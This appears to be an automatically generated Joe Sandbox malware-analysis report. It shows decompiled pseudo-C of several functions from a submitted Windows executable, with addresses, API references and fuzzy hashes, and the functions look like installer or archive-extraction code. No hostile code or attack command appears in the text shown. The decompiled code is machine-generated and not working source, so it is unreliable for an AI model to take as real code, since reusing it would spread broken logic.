Part of subcall function 00403204: free.MSVCRT(00000000,004037A4,?,?,00000000,?,?,?,00403083,?,?,?,?,00000000,0040108B), ref: 00403208

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: H_prolog$ExceptionThrowfreemalloc
String ID:
API String ID: 2423332413-0
Opcode ID: c8c338b597bb87f34b6799d60552420470ea2ee0c89de6097328a63dfc2d9501
Instruction ID: f9ed70e7a4a1b4ee0be54417d9786138a5d8b1a5d5847858de7e9c53087b4eef
Opcode Fuzzy Hash: c8c338b597bb87f34b6799d60552420470ea2ee0c89de6097328a63dfc2d9501
Instruction Fuzzy Hash: AB518371900609DFCB15EFA5C484A9EFBB4FF04314F10856FE565A72D2CB389A45CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040D191, Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040D191(void* __ecx) {
				intOrPtr _t58;
				intOrPtr* _t59;
				void* _t66;
				intOrPtr* _t67;
				void* _t68;
				intOrPtr _t70;
				intOrPtr* _t72;
				void* _t78;
				signed int _t81;
				intOrPtr _t85;
				signed int* _t87;
				signed int _t88;
				intOrPtr* _t95;
				void* _t98;
				intOrPtr* _t99;
				void* _t100;
				void* _t102;

				E00418D80(E0041A350, _t102);
				_push(__ecx);
				_t98 = __ecx;
				_t81 =  *(__ecx + 0x28);
				_t58 =  *((intOrPtr*)(__ecx + 0x2c));
				_t87 =  *(__ecx + 0x20);
				_t95 = (_t81 << 4) +  *((intOrPtr*)(_t58 + 0x58));
				if(_t87 == 0) {
					_t88 = _t81;
				} else {
					_t88 =  *_t87;
				}
				if(_t81 != _t88) {
					 *(_t102 - 0x10) = 2;
				} else {
					 *(_t102 - 0x10) = 0 |  *((intOrPtr*)(_t98 + 0xc)) != 0x00000000;
				}
				if( *((intOrPtr*)(_t102 + 8)) != 0 &&  *(_t102 - 0x10) == 0 && (_t81 >=  *((intOrPtr*)(_t58 + 0xe0)) ||  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xdc)) + _t81)) == 0) &&  *((intOrPtr*)(_t95 + 0xd)) == 0) {
					 *(_t102 - 0x10) = 1;
				}
				 *((intOrPtr*)(_t102 + 8)) = 0;
				_t59 =  *((intOrPtr*)(_t98 + 0x30));
				 *(_t102 - 4) = 0;
				_t78 =  *((intOrPtr*)( *_t59 + 0x14))(_t59, _t81, _t102 + 8,  *(_t102 - 0x10));
				if(_t78 == 0) {
					E004063E5(_t98 + 8,  *((intOrPtr*)(_t102 + 8)));
					 *(_t98 + 0x10) =  *(_t98 + 0x10) | 0xffffffff;
					if( *((char*)(_t98 + 0xd)) != 0 &&  *((char*)(_t95 + 0xe)) != 0 &&  *((char*)(_t95 + 0xd)) == 0) {
						_push(1);
						_pop(0);
					}
					 *((char*)(_t98 + 0xf)) = 0;
					 *((char*)(_t98 + 0xe)) = 1;
					 *((intOrPtr*)(_t98 + 0x18)) =  *_t95;
					 *((intOrPtr*)(_t98 + 0x1c)) =  *((intOrPtr*)(_t95 + 4));
					if( *(_t102 - 0x10) == 0 &&  *((intOrPtr*)(_t102 + 8)) == 0) {
						_t70 =  *((intOrPtr*)(_t98 + 0x2c));
						_t85 =  *((intOrPtr*)(_t98 + 0x28));
						if(_t85 >=  *((intOrPtr*)(_t70 + 0xe0)) ||  *((char*)( *((intOrPtr*)(_t70 + 0xdc)) + _t85)) == 0) {
							if( *((char*)(_t95 + 0xd)) == 0) {
								 *(_t102 - 0x10) = 2;
							}
						}
					}
					_t99 =  *((intOrPtr*)(_t98 + 0x30));
					_t66 =  *((intOrPtr*)( *_t99 + 0x18))(_t99,  *(_t102 - 0x10));
					 *(_t102 - 4) =  *(_t102 - 4) | 0xffffffff;
					_t100 = _t66;
					_t67 =  *((intOrPtr*)(_t102 + 8));
					if(_t67 != 0) {
						 *((intOrPtr*)( *_t67 + 8))(_t67);
					}
					_t68 = _t100;
				} else {
					_t72 =  *((intOrPtr*)(_t102 + 8));
					 *(_t102 - 4) =  *(_t102 - 4) | 0xffffffff;
					if(_t72 != 0) {
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t68 = _t78;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t102 - 0xc));
				return _t68;
			}

0x0040d196
0x0040d19b
0x0040d19e
0x0040d1a3
0x0040d1a6
0x0040d1a9
0x0040d1b1
0x0040d1b6
0x0040d1bc
0x0040d1b8
0x0040d1b8
0x0040d1b8
0x0040d1c0
0x0040d1cf
0x0040d1c2
0x0040d1ca
0x0040d1ca
0x0040d1d9
0x0040d1f8
0x0040d1f8
0x0040d1ff
0x0040d205
0x0040d208
0x0040d216
0x0040d21a
0x0040d23a
0x0040d23f
0x0040d247
0x0040d255
0x0040d257
0x0040d257
0x0040d260
0x0040d263
0x0040d269
0x0040d26f
0x0040d272
0x0040d27a
0x0040d27d
0x0040d286
0x0040d298
0x0040d29a
0x0040d29a
0x0040d298
0x0040d286
0x0040d2a1
0x0040d2aa
0x0040d2ad
0x0040d2b1
0x0040d2b3
0x0040d2b8
0x0040d2bd
0x0040d2bd
0x0040d2c0
0x0040d21c
0x0040d21c
0x0040d21f
0x0040d225
0x0040d22a
0x0040d22a
0x0040d22d
0x0040d22d
0x0040d2c8
0x0040d2d0

APIs

__EH_prolog.LIBCMT ref: 0040D196

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 688431a7679907d68e44e8c85a409a014ac76cdf269a26074d0c41ebe40ab3a9
Instruction ID: 4a5508fcdcfeb9f530550f46dd1ec58a167ca447d216ffc80f9ca1221c3f6995
Opcode Fuzzy Hash: 688431a7679907d68e44e8c85a409a014ac76cdf269a26074d0c41ebe40ab3a9
Instruction Fuzzy Hash: 3B418D70A00345EFDB24CF94C484B6ABBA1BF45310F1486BED496AB691C778ED89CB84

Uniqueness

Uniqueness Score: -1.00%

Function 004024DB, Relevance: 1.6, APIs: 1, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E004024DB(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _t50;
				intOrPtr _t81;
				intOrPtr _t104;
				intOrPtr _t105;
				void* _t107;

				_t96 = __edx;
				E00418D80(E004195A9, _t107);
				 *((char*)( *((intOrPtr*)(_t107 + 0x10)))) = 0;
				E004029F9(_t107 - 0xb0, __eflags);
				 *(_t107 - 4) = 0;
				 *((intOrPtr*)(_t107 - 0xb0)) = __ecx;
				E004037D2(_t107 - 0xac, __edx);
				E004037D2(_t107 - 0xa0,  *((intOrPtr*)(_t107 + 8)));
				_push(0xf0);
				_t81 = E004031DD();
				 *((intOrPtr*)(_t107 + 8)) = _t81;
				_t113 = _t81;
				 *(_t107 - 4) = 1;
				if(_t81 == 0) {
					_t50 = 0;
					__eflags = 0;
				} else {
					_t50 = E00402BC1(_t81, _t96, _t113);
				}
				 *(_t107 - 4) = 0;
				 *((intOrPtr*)(_t107 - 0x94)) = _t50;
				E004063E5(_t107 - 0x90, _t50);
				if( *((intOrPtr*)(_t107 + 0xc)) == 0) {
					E004026C1(_t107 - 0xb0, __eflags); // executed
					goto L8;
				} else {
					 *((intOrPtr*)( *((intOrPtr*)(_t107 - 0x94)) + 0xd8)) = 1;
					 *((intOrPtr*)(_t107 + 0xc)) = 0;
					 *(_t107 - 4) = 2;
					_t105 = E00418A80(_t107 + 0xc, E00402957, _t107 - 0xb0);
					if(_t105 == 0) {
						E0040368D(_t107 - 0x18);
						 *(_t107 - 4) = 3;
						E00405FAD(0xce4, _t107 - 0x18);
						E00403204(E0040264D( *((intOrPtr*)(_t107 - 0x94)), _t107 - 0x18, _t107 + 0xc),  *((intOrPtr*)(_t107 - 0x18)));
						 *(_t107 - 4) = 0;
						E00418A40(_t107 + 0xc);
						L8:
						_t104 =  *((intOrPtr*)(_t107 + 0x14));
						E004037D2(_t104, _t107 - 0x24);
						__eflags =  *((intOrPtr*)(_t104 + 4));
						if(__eflags == 0) {
							__eflags =  *((intOrPtr*)(_t107 - 0x94)) + 0xe4;
							E004037D2(_t104,  *((intOrPtr*)(_t107 - 0x94)) + 0xe4);
						}
						_t105 =  *((intOrPtr*)(_t107 - 0x28));
						 *((char*)( *((intOrPtr*)(_t107 + 0x10)))) =  *((intOrPtr*)( *((intOrPtr*)(_t107 - 0x94)) + 0xe0));
					} else {
						E00418A40(_t107 + 0xc);
					}
				}
				 *(_t107 - 4) =  *(_t107 - 4) | 0xffffffff;
				E00402B65(_t107 - 0xb0,  *(_t107 - 4));
				 *[fs:0x0] =  *((intOrPtr*)(_t107 - 0xc));
				return _t105;
			}

0x004024db
0x004024e0
0x004024fd
0x004024ff
0x0040250b
0x0040250e
0x00402514
0x00402522
0x00402527
0x00402532
0x00402534
0x00402537
0x00402539
0x0040253d
0x00402546
0x00402546
0x0040253f
0x0040253f
0x0040253f
0x0040254f
0x00402552
0x00402558
0x00402560
0x004025ec
0x00000000
0x00402566
0x0040256c
0x00402576
0x00402588
0x00402591
0x00402595
0x004025a7
0x004025b4
0x004025b8
0x004025d3
0x004025d9
0x004025df
0x004025f1
0x004025f1
0x004025fa
0x004025ff
0x00402602
0x0040260c
0x00402612
0x00402612
0x00402620
0x00402629
0x00402597
0x0040259a
0x0040259a
0x00402595
0x0040262b
0x00402635
0x00402642
0x0040264a

APIs

__EH_prolog.LIBCMT ref: 004024E0

Part of subcall function 004029F9: __EH_prolog.LIBCMT ref: 004029FE

Part of subcall function 004031DD: malloc.MSVCRT ref: 004031E3
Part of subcall function 004031DD: _CxxThrowException.MSVCRT(?,0041C8C8), ref: 004031FD

Part of subcall function 00402BC1: __EH_prolog.LIBCMT ref: 00402BC6

Part of subcall function 0040264D: SetWindowTextW.USER32(?,00000000), ref: 0040268C
Part of subcall function 0040264D: ShowWindow.USER32(?,00000001,?,00000000,769682C0,00000000,00000000), ref: 004026A0

Part of subcall function 00403204: free.MSVCRT(00000000,004037A4,?,?,00000000,?,?,?,00403083,?,?,?,?,00000000,0040108B), ref: 00403208

Part of subcall function 00418A40: FindCloseChangeNotification.KERNELBASE(00000000,00000000,004025E4,?,00000000,?,00000000,?,?,769682C0,00000000,00000000), ref: 00418A4A
Part of subcall function 00418A40: GetLastError.KERNEL32(?,769682C0,00000000,00000000), ref: 00418A54

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: H_prolog$Window$ChangeCloseErrorExceptionFindLastNotificationShowTextThrowfreemalloc
String ID:
API String ID: 2108476524-0
Opcode ID: ac195c0b695798d9808fac272235901bdee3c4edab07ab49ca39f86af56bbdc0
Instruction ID: e4ab0e75387cb74cbe1b5fc93c7fe6c9256d258209eed3f76a342f3f4d07c0fd
Opcode Fuzzy Hash: ac195c0b695798d9808fac272235901bdee3c4edab07ab49ca39f86af56bbdc0
Instruction Fuzzy Hash: 3F419D719002589BCB15EF65C995BEDBB74AF04318F0484AFE809B72C2DA785F45CB19

Uniqueness

Uniqueness Score: -1.00%

Function 0040E520, Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E0040E520() {
				intOrPtr _t46;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr _t51;
				intOrPtr* _t55;
				intOrPtr* _t59;
				void* _t65;
				void* _t75;
				intOrPtr* _t76;
				void* _t78;
				intOrPtr* _t79;
				void* _t81;
				void* _t83;

				E00418D80(E0041A4A3, _t81);
				_t79 =  *((intOrPtr*)(_t81 + 8));
				 *((intOrPtr*)(_t81 - 0x10)) = _t83 - 0x88;
				 *((intOrPtr*)(_t81 - 4)) = 0;
				 *((intOrPtr*)( *_t79 + 0x10))(_t79, _t75, _t78, _t65);
				_t76 =  *((intOrPtr*)(_t81 + 0x14));
				 *((char*)(_t81 - 4)) = 1;
				_t86 = _t76;
				 *((intOrPtr*)(_t81 - 0x14)) = _t76;
				if(_t76 != 0) {
					 *((intOrPtr*)( *_t76 + 4))(_t76);
				}
				 *((intOrPtr*)(_t81 - 0x94)) = 0;
				 *((intOrPtr*)(_t81 - 0x90)) = 0;
				 *((char*)(_t81 - 0x1c)) = 1;
				_push( *((intOrPtr*)(_t81 + 0x10)));
				 *((char*)(_t81 - 4)) = 3;
				 *((char*)(_t79 + 0x178)) = 0;
				_t46 = E0040ED82(_t81 - 0x94, _t81, _t86,  *((intOrPtr*)(_t81 + 0xc)));
				 *((intOrPtr*)(_t81 + 0x14)) = _t46;
				if(_t46 == 0) {
					 *((char*)(_t79 + 0x178)) = 1;
					_t48 = E00410B21(_t81 - 0x94, _t79 + 0x30); // executed
					__eflags = _t48;
					 *((intOrPtr*)(_t81 + 0x14)) = _t48;
					if(_t48 == 0) {
						E004063E5(_t79 + 0x28,  *((intOrPtr*)(_t81 + 0xc)));
						_t50 =  *((intOrPtr*)(_t81 - 0x94));
						 *((char*)(_t81 - 4)) = 2;
						__eflags = _t50;
						if(_t50 != 0) {
							 *((intOrPtr*)( *_t50 + 8))(_t50);
						}
						__eflags = _t76;
						 *((char*)(_t81 - 4)) = 1;
						if(_t76 != 0) {
							 *((intOrPtr*)( *_t76 + 8))(_t76);
						}
						_t51 = 0;
					} else {
						_t55 =  *((intOrPtr*)(_t81 - 0x94));
						 *((char*)(_t81 - 4)) = 2;
						__eflags = _t55;
						if(_t55 != 0) {
							 *((intOrPtr*)( *_t55 + 8))(_t55);
						}
						__eflags = _t76;
						 *((char*)(_t81 - 4)) = 1;
						if(_t76 != 0) {
							 *((intOrPtr*)( *_t76 + 8))(_t76);
						}
						_t51 =  *((intOrPtr*)(_t81 + 0x14));
					}
				} else {
					_t59 =  *((intOrPtr*)(_t81 - 0x94));
					 *((char*)(_t81 - 4)) = 2;
					if(_t59 != 0) {
						 *((intOrPtr*)( *_t59 + 8))(_t59);
					}
					 *((char*)(_t81 - 4)) = 1;
					if(_t76 != 0) {
						 *((intOrPtr*)( *_t76 + 8))(_t76);
					}
					_t51 =  *((intOrPtr*)(_t81 + 0x14));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t81 - 0xc));
				return _t51;
			}

0x0040e525
0x0040e532
0x0040e536
0x0040e53e
0x0040e541
0x0040e544
0x0040e547
0x0040e54b
0x0040e54d
0x0040e550
0x0040e555
0x0040e555
0x0040e558
0x0040e55e
0x0040e564
0x0040e568
0x0040e571
0x0040e575
0x0040e57e
0x0040e585
0x0040e588
0x0040e5be
0x0040e5c5
0x0040e5ca
0x0040e5cc
0x0040e5cf
0x0040e5fe
0x0040e603
0x0040e609
0x0040e60d
0x0040e60f
0x0040e614
0x0040e614
0x0040e617
0x0040e619
0x0040e61d
0x0040e622
0x0040e622
0x0040e625
0x0040e5d1
0x0040e5d1
0x0040e5d7
0x0040e5db
0x0040e5dd
0x0040e5e2
0x0040e5e2
0x0040e5e5
0x0040e5e7
0x0040e5eb
0x0040e5f0
0x0040e5f0
0x0040e5f3
0x0040e5f3
0x0040e58a
0x0040e58a
0x0040e590
0x0040e596
0x0040e59b
0x0040e59b
0x0040e5a0
0x0040e5a4
0x0040e5a9
0x0040e5a9
0x0040e5ac
0x0040e5ac
0x0040e648
0x0040e651

APIs

__EH_prolog.LIBCMT ref: 0040E525

Part of subcall function 00410B21: __EH_prolog.LIBCMT ref: 00410B26
Part of subcall function 00410B21: _CxxThrowException.MSVCRT(?,0041DE18), ref: 00410B65

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: H_prolog$ExceptionThrow
String ID:
API String ID: 2366012087-0
Opcode ID: 90830b7693d5648a5944311c11a3abd2fc51c06453079e5404b3f0681c69fa04
Instruction ID: 710ff75e20c748aeae2c70901895ef3fcc3945575a6bdc354df96893f0d3ab55
Opcode Fuzzy Hash: 90830b7693d5648a5944311c11a3abd2fc51c06453079e5404b3f0681c69fa04
Instruction Fuzzy Hash: E8419130900149DFDB11CFA9C988B9DBBF4AF15308F5848AEE409A7382D779DE95CB21

Uniqueness

Uniqueness Score: -1.00%

Function 0040930E, Relevance: 1.6, APIs: 1, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040930E(void* __ecx, void* __eflags) {
				void* _t50;
				void* _t54;
				void* _t59;
				signed short** _t77;
				signed short* _t80;
				signed short _t81;
				void* _t83;
				void* _t89;
				void* _t92;

				E00418D80(E00419C84, _t83);
				 *((intOrPtr*)(_t83 - 0x10)) = __ecx + 8;
				E004094DA(__ecx + 8);
				_t59 = 0;
				_t89 =  *0x41f3b8 - _t59; // 0x1
				if(_t89 > 0) {
					_t77 = 0x41f2b8;
					do {
						_t80 =  *_t77;
						E0040940E(_t83 - 0x4c);
						 *(_t83 - 4) =  *(_t83 - 4) & 0x00000000;
						E004038D0(_t83 - 0x40, _t80[6]);
						 *(_t83 - 0x48) = _t80[0xc];
						 *(_t83 - 0x44) = _t80[0x10];
						 *(_t83 - 0x4c) =  *_t80 & 0x0000ffff;
						E0040368D(_t83 - 0x28);
						 *(_t83 - 4) = 1;
						E0040368D(_t83 - 0x1c);
						_t46 = _t80[8];
						 *(_t83 - 4) = 2;
						if(_t80[8] != 0) {
							E004038D0(_t83 - 0x28, _t46);
						}
						_t81 = _t80[0xa];
						_t91 = _t81;
						if(_t81 != 0) {
							E004038D0(_t83 - 0x1c, _t81);
						}
						_t50 = E00403204(E00409178(_t83 - 0x4c, _t91, _t83 - 0x28, _t83 - 0x1c),  *((intOrPtr*)(_t83 - 0x1c)));
						 *(_t83 - 4) =  *(_t83 - 4) & 0x00000000;
						E00403204(_t50,  *((intOrPtr*)(_t83 - 0x28)));
						_push(_t83 - 0x4c); // executed
						E00409493( *((intOrPtr*)(_t83 - 0x10))); // executed
						 *(_t83 - 4) = 3;
						_t54 = E00401CF9(_t83 - 0x34);
						 *(_t83 - 4) =  *(_t83 - 4) | 0xffffffff;
						E00403204(_t54,  *((intOrPtr*)(_t83 - 0x40)));
						_t59 = _t59 + 1;
						_t77 =  &(_t77[1]);
						_t92 = _t59 -  *0x41f3b8; // 0x1
					} while (_t92 < 0);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t83 - 0xc));
				return 0;
			}

0x00409313
0x0040931f
0x00409322
0x00409327
0x00409329
0x0040932f
0x00409337
0x0040933c
0x0040933c
0x00409341
0x00409349
0x00409350
0x0040935b
0x00409361
0x00409367
0x0040936a
0x00409372
0x00409376
0x0040937b
0x0040937e
0x00409384
0x0040938a
0x0040938a
0x0040938f
0x00409392
0x00409394
0x0040939a
0x0040939a
0x004093b2
0x004093ba
0x004093be
0x004093cb
0x004093cc
0x004093d4
0x004093db
0x004093e3
0x004093e7
0x004093ec
0x004093ed
0x004093f0
0x004093f6
0x004093fe
0x00409405
0x0040940d

APIs

__EH_prolog.LIBCMT ref: 00409313

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 436dc630c05416e3cf5621d242d1c01c60a5c85469768495bcdd115d46ddbd38
Instruction ID: 4e51b77cf272770328ea170ef20ccabb87444c61482e249fd0a56672ac917635
Opcode Fuzzy Hash: 436dc630c05416e3cf5621d242d1c01c60a5c85469768495bcdd115d46ddbd38
Instruction Fuzzy Hash: C3314172D00209DBCB10EFA5D451ADEBBB8AF14315F14457EE852732D2DB386A49CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00404A40, Relevance: 1.6, APIs: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00404A40(char* __ecx, void* __eflags) {
				void* _t15;
				intOrPtr* _t18;
				signed char _t20;
				void* _t25;
				void* _t26;
				char* _t40;
				void* _t42;

				E00418D80(E00419948, _t42);
				_t40 = __ecx;
				_t15 = E00404ACE(__ecx);
				if(_t15 != 0) {
					E0040368D(_t42 - 0x18);
					 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
					if(E004048D6(_t42 - 0x18) != 0) {
						_t18 = E00403656(_t42 - 0x24, _t42 - 0x18,  *((intOrPtr*)(_t42 + 8)));
						 *(_t42 - 4) = 1;
						_t20 = E0040492E( *_t18, 1, _t40 + 4, 0); // executed
						asm("sbb bl, bl");
						_t25 =  ~_t20 + 1;
						_t17 = E00403204(_t20,  *((intOrPtr*)(_t42 - 0x24)));
						if(_t25 != 0) {
							goto L2;
						} else {
							 *_t40 = 1;
							_t26 = _t25 + 1;
						}
					} else {
						L2:
						_t26 = 0;
					}
					E00403204(_t17,  *((intOrPtr*)(_t42 - 0x18)));
					_t15 = _t26;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t42 - 0xc));
				return _t15;
			}

0x00404a45
0x00404a4e
0x00404a50
0x00404a57
0x00404a5d
0x00404a62
0x00404a70
0x00404a7f
0x00404a90
0x00404a94
0x00404aa0
0x00404aa2
0x00404aa4
0x00404aac
0x00000000
0x00404aae
0x00404aae
0x00404ab1
0x00404ab1
0x00404a72
0x00404a72
0x00404a72
0x00404a72
0x00404ab6
0x00404abc
0x00404abe
0x00404ac3
0x00404acb

APIs

__EH_prolog.LIBCMT ref: 00404A45

Part of subcall function 004048D6: GetTempPathW.KERNEL32(00000105,00000000,?,00000000), ref: 00404901

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: H_prologPathTemp
String ID:
API String ID: 2295663095-0
Opcode ID: a49cf9d5a64c2d9107d1a1b4841457935b9914ca147be5eea58a22da2a77a225
Instruction ID: 500e7c3c87435707449ca800f4b4260e57527cfcbd0d94049d93bf02f8690a9f
Opcode Fuzzy Hash: a49cf9d5a64c2d9107d1a1b4841457935b9914ca147be5eea58a22da2a77a225
Instruction Fuzzy Hash: 5201D2715801059ACF10EF65DA12BDDBBA4AF65308F04406FEA41732D2DB3E0A48CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040CF67, Relevance: 1.5, APIs: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040CF67(signed int __ecx, void* __edi) {
				void* _t22;
				signed int _t35;
				void* _t38;

				E00418D80(E0041A2E8, _t38);
				_push(__ecx);
				_t35 = __ecx;
				 *((intOrPtr*)(_t38 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x41ba6c;
				 *(_t38 - 4) = 5;
				E00407C33(__ecx);
				 *(_t38 - 4) = 4;
				E0040D079(_t35 + 0x7c, __edi);
				 *(_t38 - 4) = 3;
				E00403204(E00403204(E0040CE6F(_t35 + 0x70, __edi),  *((intOrPtr*)(_t35 + 0x5c))),  *((intOrPtr*)(_t35 + 0x50)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				E0040CFE0(_t35);
				 *(_t38 - 4) =  *(_t38 - 4) | 0xffffffff;
				asm("sbb ecx, ecx");
				_t22 = E0040D028( ~_t35 & _t35 + 0x00000018); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t38 - 0xc));
				return _t22;
			}

0x0040cf6c
0x0040cf71
0x0040cf73
0x0040cf75
0x0040cf78
0x0040cf7e
0x0040cf85
0x0040cf8d
0x0040cf91
0x0040cf99
0x0040cfad
0x0040cfb2
0x0040cfba
0x0040cfbf
0x0040cfca
0x0040cfce
0x0040cfd7
0x0040cfdf

APIs

__EH_prolog.LIBCMT ref: 0040CF6C

Part of subcall function 0040D079: __EH_prolog.LIBCMT ref: 0040D07E

Part of subcall function 0040CE6F: __EH_prolog.LIBCMT ref: 0040CE74

Part of subcall function 00403204: free.MSVCRT(00000000,004037A4,?,?,00000000,?,?,?,00403083,?,?,?,?,00000000,0040108B), ref: 00403208

Part of subcall function 0040CFE0: __EH_prolog.LIBCMT ref: 0040CFE5

Part of subcall function 0040D028: __EH_prolog.LIBCMT ref: 0040D02D

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: H_prolog$free
String ID:
API String ID: 2654054672-0
Opcode ID: c04d202dfaf42dce8f38389c920a9751c2b394dc520640e78194b7a5e7c61d27
Instruction ID: 790da130da96b865fcd1dde8fbfb491d557677c493d466ae6f611681a479457d
Opcode Fuzzy Hash: c04d202dfaf42dce8f38389c920a9751c2b394dc520640e78194b7a5e7c61d27
Instruction Fuzzy Hash: 26F0D671D14654DACB19EB69D41179DBBE09F0030CF10429EE052732C2CBBC1B048A4D

Uniqueness

Uniqueness Score: -1.00%

Function 0040CF16, Relevance: 1.5, APIs: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040CF16(void* __ebx, intOrPtr* __ecx) {
				void* __edi;
				void* _t10;
				void* _t11;
				intOrPtr* _t21;
				signed int _t24;
				void* _t26;

				_t9 = E00418D80(E0041A294, _t26);
				_push(__ecx);
				_t21 = __ecx;
				 *((intOrPtr*)(_t26 - 0x10)) = __ecx;
				_t24 =  *(__ecx + 4);
				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
				if(_t24 != 0) {
					do {
						_t9 =  *_t21;
						_t24 = _t24 - 1;
						_t13 =  *((intOrPtr*)( *_t21 + _t24 * 4));
						if( *((intOrPtr*)( *_t21 + _t24 * 4)) != 0) {
							_t11 = E0040CF67(_t13, _t21); // executed
							_t9 = E00403204(_t11, _t13);
						}
					} while (_t24 != 0);
				}
				_t10 = E00403204(_t9,  *_t21);
				 *[fs:0x0] =  *((intOrPtr*)(_t26 - 0xc));
				return _t10;
			}

0x0040cf1b
0x0040cf20
0x0040cf23
0x0040cf25
0x0040cf28
0x0040cf2b
0x0040cf31
0x0040cf34
0x0040cf34
0x0040cf36
0x0040cf37
0x0040cf3c
0x0040cf40
0x0040cf46
0x0040cf4b
0x0040cf4c
0x0040cf50
0x0040cf53
0x0040cf5e
0x0040cf66

APIs

__EH_prolog.LIBCMT ref: 0040CF1B

Part of subcall function 0040CF67: __EH_prolog.LIBCMT ref: 0040CF6C

Part of subcall function 00403204: free.MSVCRT(00000000,004037A4,?,?,00000000,?,?,?,00403083,?,?,?,?,00000000,0040108B), ref: 00403208

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

